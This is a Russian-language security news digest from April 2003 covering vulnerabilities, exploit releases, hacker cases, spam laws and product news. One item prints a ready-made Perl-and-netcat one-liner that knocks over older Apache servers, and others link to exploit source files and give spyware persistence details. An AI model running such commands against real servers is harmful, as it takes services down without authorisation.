Разбиение паролей на две части и хранение их в разных местах сделает системы более безопасными. Так считает компания RSA Security, которая на одноименном секьюрити-шоу в Сан-Франциско, кроме этой идеи, представила также платформу для расширенной интеграции своих средств управления электронными удостоверениями личности. Система RSA Nightingale использует secret-splitting — криптографический метод, прежде применявшийся в очень дорогих системах, которые создавались на заказ для банков. Пароли криптографически делятся на две части, и сервер Nightingale хранит одну из них — в соответствии с методом, изобретенным специалистом по криптографии Ади Шамиром в 70-х годах прошлого века. «Это secret-splitting для широких масс», — пояснил главный специалист RSA Security Берт Калиски. В июне компания выпустит инструментарий разработчика. Система рассчитана на совместное применение с системами на основе смарт-карт, так что пароли пользователей, а также их личные секреты, доверенные компании для поиска этих паролей, остаются недоступными, даже если хакер заберется в сервер. «Обычно все данные хранятся в одном месте, поэтому, если происходит утечка, рушится вся система, — поясняет Калиски. — Метод secret-splitting исключает единое компрометирующее звено». Подробности - http://www.zdnet.ru/?ID=299648
17/04/2003 12:49 Хакеры взломали пять сайтов английского правительства.
Французские хакеры из группировки DkD[ll атаковали официальные сайты правительства Великобритании. Сетевые хулиганы взломали пять английских государственных web-ресурсов (Adjudicatorsoffice.gov.uk, College-of-arms.gov.uk, Defencebills.gov.uk, Gamblingreview.co.uk и Royalparks.gov.uk), сообщает Вебпланета со ссылкой на сайт исследовательской компании Mi2g. В настоящий момент эти ресурсы недоступны. Так члены DkD[ll выразили свое несогласие с военной политикой США, Британии, Израиля и России. На страницах взломанных сайтов хакеры оставили гневные послания английским и американским властям по поводу войны в Ираке, а так же требования в адрес Путина и Шарона немедленно освободить Чечню и Палестину. По данным Вебпланеты, группировка DkD[ll занимает шестое место в двадцатке наиболее активных хакерских организаций интернета. Источник - http://www.lenta.ru
17/04/2003 12:16 Американцы не спешат в Сеть из-за безграмотности.
Каждый пятый американец утверждает, что не заходит в Сеть и не планирует этого делать в будущем. Об этом говорится в исследовании, проведенном некоммерческой организацией Pew Internet & American Life Project. Результаты опроса показали, что число пользователей интернета практически не растет последние два года, поскольку у многих людей отсутствует интерес к электронной почте или веб-серфингу. Примечательно, что четверть не желающих пользоваться интернетом не делает это из-за пробелов в образовании - таким людям едва хватает знаний даже на то, чтобы справляться с повседневными задачами. Четверть не пользующихся Сетью не имеют диплома об окончании средней школы. Для сравнения - школу не смогли окончить всего 5% тех, кто Сетью пользуется. Всего 11% не пользующихся интернетом смогли закончить колледж, при том, что 36% пользователей Сети его закончили. Исследователи пришли к выводу, что степень образованности является одним из ключевых факторов, приводящих человека в интернет - наибольший процент пользователей зафиксирован среди тех, кто уже имеет высшее образование или является студентом. Всего же интернетом не пользуются 42% американцев. Помимо образования, важную роль играет цвет кожи, доход, возраст и место жительства. Белые более склонны к использованию Сети, чем афроамериканцы. Хорошо обеспеченные люди скорее заинтересуются возможностями интернета, чем бедные. Жители города и пригорода с большей вероятностью имеют доступ в Сеть, чем деревенские жители. Молодежь более заинтересована в интернете, чем пожилые люди. Источник - http://www.cnews.ru
17/04/2003 11:19 IPSec-соединение между Windows 2000 и OpenBSD.
Человек, представившийся Andy, ссобщил ссылку на статью, представляющую собой небольшой материал для начинающих в VPN. Cтатья - http://ipsec-conn.narod.ru/IPSecWin2kOpenBSD.htm
17/04/2003 10:52 Переполнение буфера в обработчике сообщений Windows-kernel (патч).
Переполнение буфера обнаружено обработчике сообщений об ошибках Windows ядра. Локальный или удаленный атакующий может получить административные привилегии на уязвимой системе. Windows kernel - ядро операционной системы. Оно обеспечивает службы системного уровня, типа управления устройствами и памятью, распределяет процессорное время между процессами и управляет обработкой ошибок. Недостаток обнаружен в пути, которым сообщения об ошибках ядра передаются отладчику. В результате успешной эксплуатации этой уязвимости, нападающий может запустить произвольный код на системе и выполнить любое действие, включая удаление данных, добавление учетных записей с административным доступом или переконфигурирование системы. Для осуществления успешного нападения, нападающий должен быть способен подключится в интерактивном режиме к системе или к консоли или к терминальной сессии. Microsoft оценил риск обнаруженной уязвимости как "Important". Уязвимость обнаружена в Microsoft Windows NT 4.0, Windows 2000, and Windows XP. Подробности - http://www.SecurityLab.ru/?ID=37314
17/04/2003 10:21 Открылся новый свободный почтовый сервер.
Сообщается об открытии нового свободного мейл-сервера по адресу http://www.mail15.com. Позволяет хранить в почтовом ящике до 15 МБ, гарантируется конфиденциальность и большая гибкость в настройках, имееет антивирусную защиту и защиту от спама, гибкий и лёгкий вэб-интерфейс без рекламных баннеров и много ещё чего полезного. Сайт - http://www.mail15.com/?rid=67324
17/04/2003 09:14 Антиспамерский закон в действии.
Девять месяцев назад на территории штата Канзас был введен первый антиспамерский закон - Kansas Commercial Electronic Mail Act. И вот уже сейчас граждане пожинают ощутимые плоды. Пользователи торжествуют. Спамеры трепещут и боятся. Недавно в суд Канзаса обратился с иском специалист по е-маркетингу и активист антиспамерского движения Джерри Уэйнсток. Джерии обвинил в нарушении закона американскую фирму Market Advantage Consulting. Он потребовал от обвиняемой фирмы, ни много ни мало, 1000 долларов за причиненный ему моральный ущерб. Судебный процесс занял всего один день и закончился не в пользу спамеров, несмотря на все их аргументы. Уэйнстэк выиграл 500 долларов и еще 51$ за издержки. По словам прокурора, компания Market Advantage Consulting нарушила все статьи Kansas Commercial Electronic Mail Act. Источник - http://www.viruslist.ru
14/04/2003 14:36 Отправка неавторизованных почтовых сообщений в AMaViS Anti-Virus Scanner.
Уязвимость обнаружена в AMaViS anti-virus сканере. Удаленный пользователь может эксплуатировать почтовый сервер, использующий AMaViS, чтобы посылать неавторизованные почтовые сообщения. Как сообщается, удаленный пользователь может посылать неавторизованные почтовые сообщения через postfix почтовый сервер с запущенным AMaViS-ng. Система для отправки сообщений использует "To:" заголовок, вместо "RCPT TO:" команды. Уязвимость обнаружена в AMaViS Anti-Virus Scanner 0.1.6.x. Подробности и пример - http://www.securitylab.ru/?ID=37205
14/04/2003 13:31 Microsoft ограничивает поддержку XML в Office 2003.
Microsoft вносит новые различия в профессиональную и стандартную версии Office 2003. Это означает, что многие заказчики могут не получить всех обещанных им функций, в том числе поддержки веб-сервисов. Больше года Microsoft хвасталась наличием в Office 2003 поддержки стандарта Extensible Markup Language (XML), долгожданной новой функции комплекса офисных приложений. Однако теперь компания планирует предоставить ее в полной мере лишь в двух самых дорогих версиях продукта, одна из которых будет доступна только корпоративным подписчикам программы оптового лицензирования Microsoft. Аналогичные ограничения накладываются и на две другие функции: технологию защиты документов Windows Rights Management Services (RMS) и средство повышения качества анализа списков данных Excel List. Все три функции Microsoft планирует выпустить только в версиях Office 2003 Enterprise и Professional. На протяжении двух этапов бета-тестирования — в октябре и в марте — Microsoft ни разу во всеуслышание не заявляла, что поддержка XML будет не во всех версиях Office 2003. Последняя бета-версия, доступная полумиллиону испытателей, содержит все обещанные Microsoft XML-функции. Правда, это ни о чем не говорит, так как Microsoft разослала бета-тестерам версию Enterprise. Подробнее - http://www.zdnet.ru/?ID=299272
14/04/2003 12:54 Подведены итоги конференции "Информационная безопасность корпорации: практический подход".
10-11 апреля издательство "Открытые системы" и IDC организовали и провели в Москве международную конференцию "Информационная безопасность корпорации: практический подход". Вице-президент издательства "Открытые системы" Павел Христов считает, что "Обеспечение безопасности требует комплексного, системного подхода, охватывающего как технологические, так и организационные аспекты". В таком же ключе высказался Джон Ганц, директор по исследованиям и старший вице-президент компании IDC: "Сегодня информационную безопасность ИТ нельзя рассматривать как некую вынужденную "страховку" или "дополнительные расходы", необходимые для использования информационных систем в бизнесе. Обеспечение безопасности стало обязательным условием его ведения. Современный бизнес - это, прежде всего, коммуникации, необходимые в электронной торговле, автоматизации цепочек поставок, партнерских сетях". Владимир Мамыкин, менеджер по системам безопасности продуктов Microsoft, отметил, что "Корпорация Microsoft своей стратегической и приоритетной задачей на ближайшие годы считает создание защищенных информационных систем (Trustworthy Computing). Под "защищенностью" информационных систем корпорация понимает гораздо больше, чем просто обеспечение безопасности данных". В компании Symantec считают, что возможное появление в будущем еще более разрушительных комбинированных угроз продолжает оставаться одним из наиболее серьезных факторов опасности для всех пользователей интернета. Единственной защитой от этих угроз, по словам Владимира Ларина, главы представительства в России и СНГ корпорации Symantec, "являетсякомплексное обеспечение безопасности на всех уровнях, включая интернет-шлюзы, сетевые серверы и рабочие станции". Подробнее - http://www.cnews.ru/newsline/index.shtml?2003/04/14/143124
14/04/2003 12:00 Уязвимость в СУБД Progress.
Как сообщает Secure Network Operations,Inc. в СУБД Progress обнаружена уязвимость, позволяющая локальному пользователю получить привилегии суперпользователя. Связана она с обработкой переменной среды DLC, при помощи которой СУБД обнаруживает директорию, в которой инсталлирована база. Однако ПО Progress не проверяет границы этой переменной, что позволяет локальному пользователю (путём задания длинного имени этой переменной) переполнить буфер и выполнить произвольный код в пространстве памяти процесса. Уязвимость была обнаружена во сех версиях от 6 до 9.1D05 в ОС: Linux, SunOS, SCO, TRU64 и других *никсах. Рекомендуется обновиться до версии 9.1D05. Патч - http://www.progress.com/patches/patchlst/91D-156v.htm
14/04/2003 10:06 Официально стартовал проект, альтернативный XFree86.org.
Как сообщает linux.org.ru, Keith Packard начал новый проект. На днях стартовал xwin, альтернативный проект по созданию X-сервера "другого типа". В настоящий момент проект набирает сторонников, из числа которых в последствии будет сформировано "правительство". По мнению г-на Пакарда, это может занять несколько недель. Подробности - http://xwin.org/index.php
14/04/2003 09:40 Технология Windows Media будет портирована на Linux.
Компания InterVideo, известная своим программным DVD-плеером WinDVD и другими мультимедийными продуктами, объявила о заключении лицензионного соглашения с корпорацией Microsoft. По условиям этого соглашения InterVideo получает право на включение аудиокодеков Windows Media, а также технологий организации потоковых трансляций и управления цифровыми правами в свои программные продукты, предназначенные для бытовой электроники на платформе Linux. О переносе Windows Media Player на Linux для персональных компьютеров речи пока не идет... Источник - http://compulenta.ru
13/04/2003 15:09 FreeBSD в качестве сервера доступа.
На сайте "Домашние Сети России" (www.hub.ru) опубликована статья "FreeBSD в качестве сервера доступа". Как пишет сам автор, "Цель данной цикла статей - помочь "чайнику" сделать первые шаги на пути к почетному званию "гуру", и помочь построить свой первый сервер доступа в сеть Интернет на основе замечательной, надежной и производительной операционной системы FreeBSD. Надеюсь, Вы полюбите эту операционную систему так же, как я, и даже немножко сильнее". При описании настройки акцент делается на дистрибутив FreeBSD 4.2. Как понятно из вступления автора, предназначена статья для начинающих пользователей FreeBSD. Cостоит из частей: введение, простой сервер доступа с NAT, немного о безопасности, настройка FireWall. Статья - http://www.hub.ru/modules.php?name=Sections&sop=viewarticle&artid=24&page=4
13/04/2003 14:45 OpenBSD сражается с переполнением буфера.
По сообщению nixp.ru, проект OpenBSD надеется, что нововведения в их последнем релизе позволят избавиться от переполнений буфера - проблема программного обеспечения, которая мучает специалистов компьютерной безопасности на протяжении трех десятелетий. Theo de Raadt, лидер проекта, уверен, что улучшения, которые должны будут появиться в их реализации Unix'а до первого мая, сделают вызов переполнения буфера практически невозможной задачей. Переполнение буфера (buffer overflow) - ошибка в памяти в программном обеспечении, позволяющая атакующему запускать свою произвольную программу. "Можно сказать, что я убиваю переполнения буфера, но я нахожусь в сообществе безопасности, поэтому придется взять это высказывание в ковычки", - сказал он на шоу безопасности CanSecWest в четверг. Подробности - http://news.com.com/2100-1002-996584.html?tag=fd_top
13/04/2003 14:22 Выход Mac OS X 10.2.5.
Apple Computer сообщает о выпуске новой версии выпускаемой фирмой ОС - Mac OS X 10.2.5. В этой версии устранены сразу 7 критических уязвимостей. Среди них уязвимости: OpenSSL, Apache-вэб-сервер, Sendmail, Samba и 2 новых уязвимости в службе DirectoryService. Уязвимости в DirectoryService были обнаружены и опубликованы @stake, Inc. и позволяют локальному пользователю получить привилегии суперпользователя на сервере. Связана с некорректным выполнением при запуске команды touch(), вызывающей функцию system() библиотеки libc. Для использования уязвимости удалённый атакующий должен сначала прервать DirectoryService, что сделать достаточно легко, зафлуживая порт 625. Также в новой версии включена поддержка технологии Bluetooth для телефонов Nokia 7650 и P800, а также поддержка технологии Image Capture для камер Canon. Улучшена поддержка декодирования почтовых сообщений для иностраннных языков, и работа AppleEvents (взаимодействие между приложениями, запущенными в классической среде и в среде MacOS X). Всем пользователям и администраторам настоятельно рекомендуется обновиться. Новая версия ОС - http://docs.info.apple.com/article.html?artnum=25405
13/04/2003 13:14 Ещё один вариант эксплоита уязвимости в Apache.
Довольно простой вариант эксплоита Апача версий < 2.0.45 обнаружен и оглашён Paul Johnston, специалистом по Интернет-безопасности из Westpoint Limited (Манчестер, Великобритания). Для его реализации необходимо иметь на компьютере Perl и netcat. Выглядит он следующим образом: perl -e 'print "\r\n" x 4000000' | nc <target> 80. Источник - http://www.securityfocus.com
13/04/2003 12:25 Рулевые сети: стращать и не пущать.
Под таким заголовком опубликована в журнале "Планета Internet" cтатья Юрия Росича. В ней рассказывается о том, как в различных странах борятся с такими проблемами, как доступ к "нежелательным" (с точки зрения государства - его политики и религии) Вэб-ресурсам, сетевой терроризм (как стороны подданых государства, так и со стороны внешних кибер-врагов). Сокращённая версия статьи опубликована на сайте "Yтро.RU". Статья - http://www.utro.ru/articles/20030408032431139700.shtml
13/04/2003 11:58 Получить AS, подсеть IP-адресов или LIR стало проще.
По сведениям независимого обзора провайдеров, компания «Гарант-Парк-Телеком» начинает предоставлять услуги по выделению сетей IP-адресов, автономных систем, помощи в получении и сопровождении статуса LIR (локальная Интернет-регистратура), а также услуги по взаимодействию с RIPE, построению и сопровождению BGP-маршрутизаторов. Теперь не обязательно переписываться с RIPE, можно доверить решение проблем с AS, PI и LIR компании «Гарант-Парк-Телеком». Блок из 256 адресов (подсеть класса «С» в традиционной терминологии) обойдется в $256 ежегодно, управление сетью из 256 адресов или автономной системой — $49 в месяц, установка и настройка пограничного маршрутизатора на базе CISCO — $400 единовременно. Подробности - http://www.parkline.ru/ripe/
13/04/2003 11:31 Бета-версии Opera 7.10.
Как сообщает nixp.ru, 11 апреля Opera Software представила общественности релиз Opera 7.10 для Windows и Opera 7.10 для Linux Beta с новыми возможностями, которые новы не только для Opera, но и являются нововведения в мировом browsing'е. Сразу в глаза бросаются две новые кнопки в tollbar'е, FastForward и Rewind, позволяющие ускорить Web-навигацию пользователю. Подробности - http://www.opera.com/pressreleases/en/2003/04/11/
13/04/2003 10:40 Nokia защитит вас от вирусов и спама.
Финская компания Nokia на проходящей с 13 по 17 апреля в Сан-Франциско RSA Conference планирует огласить первые подробности о Nokia Message Protector, своем новейшем программно-аппаратном комплексе, предназначенном для защиты корпоративных сетей от спама и распространяющихся через электронную почту вирусов. Аппаратная компонента комплекса представляет собой устройство форм-фактора 1RU, подключаемое между корпоративным сетевым экраном и почтовыми серверами (см. схему). "Начинка" устройства вполне соответствует ожиданиям: два чипа Xeon, 1GB памяти и два HDD SCSI 36GB в конфигурации RAID-1 с возможностью "горячей" замены. По заявленным спецификациям, NMP способен обрабатывать до 120 тысяч электронных писем в час. В число программных компонент устройства входят: переработанная с точки зрения повышенной безопасности ОС Linux, работающая в реальном времени и встречающая входящий из интернета трафик; сетевой экран (firewall); виртуальная частная сеть (VPN); управление политиками (policy management); формирование трафика (traffic shaping); антивирусная защита. На создание столь комплексного набора программ у Nokia и ее партнеров (в разработке участвовали Checkpoint Software, Fishnet Security, Permeo Technologies, Surfcontrol, Tripwire и Trend Micro) ушел почти год. Сердце набора: принадлежащая Nokia технология "статистической защиты" (statistical protection), определяющая, блокирующая и удаляющая вирусы и спам из входящей корпоративной почты на основе вероятности присутствия тех или иных слов, знаков в спам-письмах. Подробности - http://www.nokia.com/nokia/0,5184,4879,00.html
12/04/2003 19:02 Маршрутизатор на дискете - Freesco.
10 апреля опубликована интересная статья Карлы Шрёдер под названием "New and Improved Router on a Floppy Disk: Freesco in 2003". Представляет собой обзор программного продукта под названием Freesco - дистрибутива на одной дискете. Само название Fressco расшифровывается как FREE ciSCO. Как пишут авторы - представляет собой альтернативу (очень дешёвую) маршрутизаторам фирмы CISCO. Дистрибутив может быть запущен - с дискеты, жёсткого диска, с образа диска в оперативной памяти. Легко конфигурируется, имеет минимальные системные требования и может быть адаптирован для множества решаемых задач. Версия 0.3.х требует для своей работы 486 процессор с 8 мегабайтами ОЗУ. В новой версии авторы значительно улучшили интерефейс для работы дистрибутива. Версия 0.3.1 построена на базе ядра Linux 2.0.39. Cтатья - http://networking.earthweb.com/netos/article.php/2184011
12/04/2003 14:53 Эксплоит уязвимости в Apache.
Опубликован ещё один эксплоит уязвимости, обнаруженной iDEFENSE в версиях 2.х и связанной с утечкой памяти. Написан на Си Daniel Nystrцm из Норвегии. В отличие от опубликованного ранее эксплоита под названием apache-massacre.c, работает в Linux. Эксплоит - http://www.security.nnov.ru/files/th-apachedos.c
12/04/2003 13:51 Компьютерная преступность в России - актуальное интервью.
Как известно, борьбой с преступлениями в сфере высоких технологий в России занимается Управление "К" МВД РФ. Специалисты отмечают, что рост числа таких правонарушений идет не менее быстрыми темпами, чем компьютеризация. Взломами занимаются представители самых различных возрастных категорий и социальных слоев населения. Профессиональными хакерами можно назвать только небольшой процент преступников. Уровень компьютерной грамотности большинства компьютерных преступников оставляет желать лучшего. Но и его оказывается достаточно для того, чтобы завладеть конфиденциальной информацией некоторых беспечных пользователей. Преступников не пугает и тот факт, что по ст. 272 Уголовного кодекса РФ им "светит" от шести месяцев до пяти лет лишения свободы. В интервью "АиФ" руководитель пресс-службы Управления "К" МВД РФ Анатолий Платонов отметил, что быстрая поступь компьютеризации в России вызывает такой же рост числа компьютерных преступлений. По данным Управления "К", в прошлом году таких правонарушений было совершено 3,5 тысячи, что означает рост в 3,5 раза по сравнению с 2001 годом. "И хотя преступники ежедневно "ломают" до 10 компьютеров, мы найдем любого. Дело только во времени", - заметил Анатолий Платонов в своем интервью. Источник - http://www.crime-research.org
12/04/2003 13:05 Компания Adobe представило семейство продуктов Acrobat 6
Главное отличие продуктов новой версии от предшественников – широкая поддержка XML. Это, впрочем, не отменяет поддержки "родного" для Acrobat формата – PDF. Плюс, естественно, множество непринципиальных улучшений, которые, как уверяет Adobe, значительно облегчат работу с программами. В настоящий момент в семейство Acrobat входит 4 продукта. Три из них – Acrobat 6.0 Professional, Acrobat 6.0 Standard и Acrobat Elements – позволяют создавать и редактировать файлы в формате PDF. Один предназначен, в основном, для чтения и печати – это, конечно же, Acrobat Reader. Подробности - http://www.adobe.com/aboutadobe/pressroom/...
12/04/2003 12:36 Калужский хакер получил 1 год и 3 месяца условно.
Калужский районный суд вынес приговор по уголовному делу в отношении студента техникума Сергея Афанасьева. Он признан виновным в совершении преступления, предусмотренного ст.272 ч.1 (неправомерный доступ к компьютерной информации) и ст.273 ч.1 (создание, распространение и использование вредоносных программ для ЭВМ). Суд приговорил молодого человека к условному наказанию в виде одного года и трех месяцев лишения свободы с испытательным сроком шесть месяцев и штрафу в 140 рублей. С помощью "перекачанного" из сети программного обеспечения калужский хакер выявил 38 пользователей, компьютеры которых не были в должной мере защищены системами безопасности. Среди пострадавших оказались не только простые граждане, но и такие уважаемые учреждения, как областной департамент финансов и бюджета и его районные подразделения, а также известные в регионе фирмы: ООО "Комбета", "Лиси-Сервис", "Гигиена-Сервис", "Мосстройтрансгаз", Воротынский электроремонтный завод и другие. Умелец настраивал свой компьютер на нужные пароли и сутками сидел в сети за чужой счет. Но вскоре законные хозяева паролей заметили, что не могут выйти в Интернет, пока кто-то удовлетворяет свои информационные потребности. Возникло подозрение, а затем и обращение в подразделение УФСБ, специализирующееся на компьютерной преступности. Источник - http://www.utro.ru
12/04/2003 12:21 Число интернет-атак неуклонно растет.
Число взломов в интернете в первом квартале 2003 года разительно выросло, о чем свидетельствует отчет, подготовленный компанией Internet Security Systems (ISS). Согласно ему, за прошедшие три месяца было зарегистрировано 106,57 млн случаев, так или иначе связанных с угрозой безопасности в интернете. Это почти в десять раз превышает цифру, относящуюся с предыдущим аналогичным периодом. Кроме того, ISS отследила 2 551 сетевую атаку, что свидетельствует росте количества в 36,6% по сравнению с последним кварталом 2002 года. Отчет был составлен отделом X-Force, который в ISS отвечает за исследования. Существенное увеличение числа инцидентов, связанных с безопасностью (таких, как сканирование системы в поисках уязвимых мест и т.п.), связывается с большим количеством новых вирусов и комбинированных атак. Руководитель X-Force, Крис Роуланд (Chris Rouland), считает, что такое положение вещей сильно осложняет работу специалистов по безопасности и IT-администраторов. Отчёт X-Force - https://gtoc.iss.net/documents/summaryreport.pdf
12/04/2003 11:13 Создатель Isonews.com сядет в тюрьму.
Американский суд приговорил бывшего автора и владельца сайта Isonews.com Дэвида Рoччи (David Rocci) к пяти месяцам тюрьмы и выплате денежной компенсации в размере 28 с половиной тысяч долларов США. Дэвид Рoччи был признан виновным в реализации мод-чипов, позволяющих обходить защиту приставки Microsoft Xbox, что является нарушением Закона о защите авторских прав в цифровую эпоху (DMCA). Один из самых известных пиратских сайтов IsoNews, посещаемость которого равнялась примерно 140000 заходов в день, был закрыт в начале марта. В данный момент доменное имя isonews.com конфисковано Министерством юстиции США. На сайте Isonews.com не было собственно самих копий пиратских программ, там располагались лишь различные форумы, где можно было без труда отыскать ссылки на соответствующие серверы. Очевидно, что властям давно не нравилась деятельность Роччи, однако, формального повода закрыть сайт у них не было. Когда же Роччи решил расширить сферу своей деятельности и начал продавать мод-чипы, такая возможность сразу представилась. Чипы Enigmah сайтов IsoNews заказывал в Великобритании, а затем перепродавал в США как по отдельности, так и в комплекте с приставками. Это было явным нарушением закона DMCA. Источник - http://news.bbc.co.uk
12/04/2003 10:09 Информация о троянце SpyAg.
Как сообщает "Лаборатория Касперского", обнаружена новая программа-шпион SpyAgent, которая предназначена для скрытого сбора информации о пользователе, работающем на компьютере. Она осуществляет мониторинг нажатых клавиш, выполняемых приложений, сетевых соединений, просматриваемых документов и вводимых пользователем паролей, а также периодически "фотографирует" экран и записывает полученные "снимки" в специальный каталог в виде отдельных файлов. В зависимости от конфигурации программа SpyAgent: скрытно устанавливается в систему, во время работы ничем не выдает своего присутствия, выполняет несанкционированный пользователем сбор персональных данных, отсылает полученные данные на заданный электронный адрес. При инсталляции регистрирует себя в ключе автозапуска системного реестра: HKLM\Software\Microsoft\Windows\CurrentVersion\Run - "Srv32Win". "Снимки" экрана сохраняет в файлы "wincfg*.*" в подкаталоге каталога Windows. Источник - http://www.kaspersky.ru
11/04/2003 17:46 Stupid Security Competition. Результаты.
Сообщение с www.bugtraq.ru. В конкурсе на самое тупое применение мер безопасности, о котором сообщал bugtraq.ru в феврале, все-таки не обошлось и без России. Почетное второе место в номинации Most Egregious Security Measures (дословный перевод - "Наиболее вопиющая мера безопасности", в общем, самые беспредельные :)) досталось московскому мэру за московскую прописку. Подробности - http://www.privacyinternational.org/activities/stupidsecurity/
11/04/2003 16:04 Cтатья по стеганографии.
Hal Flynn из Symantec Corp. анонсировал выход новой статьи, посвящённой стеганографии - технологии, позволяющей внутрь вполне легитимного файла (например, файла изображения формата GIF) вставить важные данные. Статья называется "Steganography Revealed", автор - Kristy Westphal. Собственно, в самой статьи рассказывается об основах этой технолгии и примерах её применения. Статья - http://www.securityfocus.com/infocus/1684
11/04/2003 14:15 Эксплоит уязвимости в Samba.
Ещё один эксплоит, использующий уязвимость в SMB/CIFS - сервере Самба, об уязвимости в котором мы сообщали ранее. На сей раз написан на языке С. Создан eSDee (www.netric.org|be). Эксплоит - http://packetstorm.linuxsecurity.com/0304-exploits/sambal.c
11/04/2003 14:08 Уязвимость в KDE.
Как пишет Dirk Mueller от имени команды разработчиков графической оболочки для открытых систем KDE, в ней обнаружена уязвимость. Заключается она в некорректной обработке PS/PDF-файлов в ПО Ghostscript, как раз и предназначенного для просмотра этих типов файлов. Наличие этой уязвимости позволяет локальному или удалённому злоумышленнику создать специальный PDF илИ PS - файл, при просмотре которого будут выполнены произвольные команды, встроенные в тело файла от имени пользователя, выполняющего просмотр. Обнаружена в версиях KDE 2 и 3 до версии 3.1.1 включительно. Для ликвидации уязвимости выпущены версии 3.0.5b, 3.1.1a, а также патчи для 2.2.2. При невозможности обновления рекомендуется убрать файлы: thumbnail.protocol, eps.kimgio, kghostview.desktop, kdvi.desktop. Естественно, это приведёт к невозможности просмотра файлов PDF, PS и DVI. Подробности - http://www.kde.org/info/security/advisory-20030409-1.txt
11/04/2003 13:21 FAQ об ОС Windows на русском.
Возможно, это и не совсем свежий материал, но вот обнаружен сайт, посвящённый ответам на наиболее часто задаваемые вопросы (FAQ) по операционным системам Windows 95/98/ME/NT/2000/XP. Называется "Часто задаваемые вопросы по Windows 95/98/ME/NT/2000/XP. Руководство по выживанию для администраторов и пользователей". Надеемся, что этот сайт кому-то окажется полезен. FAQ - http://winfaq.com.ru/
11/04/2003 12:48 Microsoft распахивает «окна» для AMD.
Microsoft планирует выпустить две специализированные версии своей операционной системы Windows для будущих 64-разрядных процессоров компании Advanced Micro Devices. В марте Microsoft предоставила производителям ПК 32- и 64-битные версии Windows Server 2003 для процессоров Intel Xeon и Itanium 2. Есть также 64-битная версия Windows XP для рабочих станций Itanium 2. Теперь компания вплотную занялась процессорами AMD. Во вторник Microsoft сообщила о своем намерении предложить 64-битную версию Windows Server 2003 для серверных чипов AMD Opteron. Кроме того, софтверный гигант выпустит 64-битную редакцию Windows XP, рассчитанную на процессоры Athlon 64 для настольных и портативных ПК. Подробности - http://www.zdnet.ru/?ID=299096
11/04/2003 12:16 Суд запретил взлом программы для фильтрации порнографии.
Федеральный суд США завершил рассмотрение иска Американского союза гражданских свобод, который был подан в интересах студента юридического факультета Гарвардского университета Бена Эдельмана. Ответчиком по иску выступала компания N2H2, которая занимается выпуском ПО для фильтрации контента в интернете, прежде всего порнографического характера. Эдельман намеревался проанализировать программу с целью обнаружения в продуктах N2H2 уязвимостей и способов обхода фильтров. Однако выполнить задуманное Эдельман не смог, поскольку N2H2 отказалась предоставить ему необходимый для проведения исследований список блокируемых сайтов. Тогда Эдельман решил получить нужную информацию путем обратной разработки программы. Однако такие действия запрещены Законом о защите авторских прав в цифровую эпоху (DMCA). Защитить интересы Эдельмана взялся Американский союз гражданских свобод, поскольку, по мнению его активистов, право Эдельмана на проведение исследований защищает Первая поправка к Конституции США, гарантирующая свободу слова. Источник - http://www.compulenta.ru/2003/4/11/38952/
11/04/2003 11:52 В США предложен новый законопроект против спама.
Сенаторы Конрад Бернс и Рон Уайден предложили новый законопроект, призванный разрешить проблему спама и одновременно учесть интересы фирм, занимающихся прямыми продажами и маркетингом. Сенаторы предлагают обязать организаторов рассылок указывать настоящие обратные адреса, по которым им можно послать ответ или отказаться от получения рассылки. При этом организаторы рассылок должны отписывать недовольных рекламой пользователей по первому требованию. Авторы законопроекта полагают, что он, с одной стороны, позволит соблюсти интересы пользователей интернета, а с другой, будет отвечать целям компаний, занимающихся рекламой в интернете. Законопроект предусматривает возможность судебного преследования спамеров. Индивидуальные пользователи подавать иски не смогут, однако на такой шаг от их лица могут пойти генеральные прокуроры штатов. Кроме того, провайдеры интернета смогут блокировать спамерские рассылки, а Федеральная комиссия по торговле (FTC) получит право штрафовать злостных нарушителей. Источник - http://story.news.yahoo.com/news?...
11/04/2003 10:59 Китайские разработчики ПО объединяются против Microsoft .
Завершен процесс объединения двух крупнейших игроков китайского софтверного рынка - компании Kingsoft и технологического отдела China GongChuang Software Alliance. Kingsoft - разработчик китайской иероглифической версии текстового редактора WPS Office - аналога MS Word. GongChuang одним из первых начал разработку Linux-приложений в Китае и сейчас лидирует на рынке ПО под Linux. Целью объединения компаний стала разработка китайской версии WPS Office для Linux. Как отмечают в COMPUTER.TRADESHOW.RU, разработка Linux-приложений и переход на эту операционную систему объявлен государственной стратегией КНР. Но, тем не менее, большинство государственных учреждений до сих пор используют ОС Windows. В связи с этим, вице-президент Kingsoft заявил, что компания пока не собирается прекращать работу с WPS Office под Windows. Работы по переводу WPS Office на Linux планируется завершить в течение ближайших двух лет. Появление Linux-версии популярнейшей в Китае программы грозит пошатнуть господствующее положение Microsoft на одном из самых перспективных рынков ПО. Источник - http://www.cnews.ru
11/04/2003 10:02 Новые "заплатки" от Microsoft: скажем "нет" форматированию жестких дисков!
Текст новости взят с сайта "Лаборатории Касперского". Microsoft расправилась с двумя очередными "дырами" в своем ныне вездесущем ПО. Первая "дыра", обнаруженная в потихоньку отмирающей по соглашению с Sun Microsystems Microsoft Virtual Machine (Microsoft VM), позволяет злоумышленникам запускать через интернет на пользовательском компьютере программы, изменять любые файлы на свое усмотрение и - в качестве десерта - форматировать жесткие диски. Технические подробности можно узнать на странице соответствующего security bulletin. Установить устраняющую недетскую "дырочку" заплатку можно через фирменный сайт Windows Update. Вторая "дыра" не столь опасна для конечного пользователя, но может очень приглянуться вирусописателям: используя ip-пакеты определенного содержания, можно осуществить DoS-атаку на серверы с установленными на них MS Proxy Server 2.0 или MS Internet Security and Acceleration (ISA) Server 2000. Более того, путем нехитрых манипуляций, атакующий может "зациклить" пакеты между двумя непропатченными серверами, работающими под управлением вышеназванного ПО Microsoft. Эффект в обоих случаях один: перегрузка сервера запросами и его неспособность к дальнейшему выполнению своих прямых задач. Описание от iDefense - http://www.idefense.com/advisory/04.09.03.txt Бюллетень Microsoft - http://www.microsoft.com/security/security_bulletins/ms03-012.asp
10/04/2003 19:26 Владимир Путин подписал новый закон о защите авторских прав.
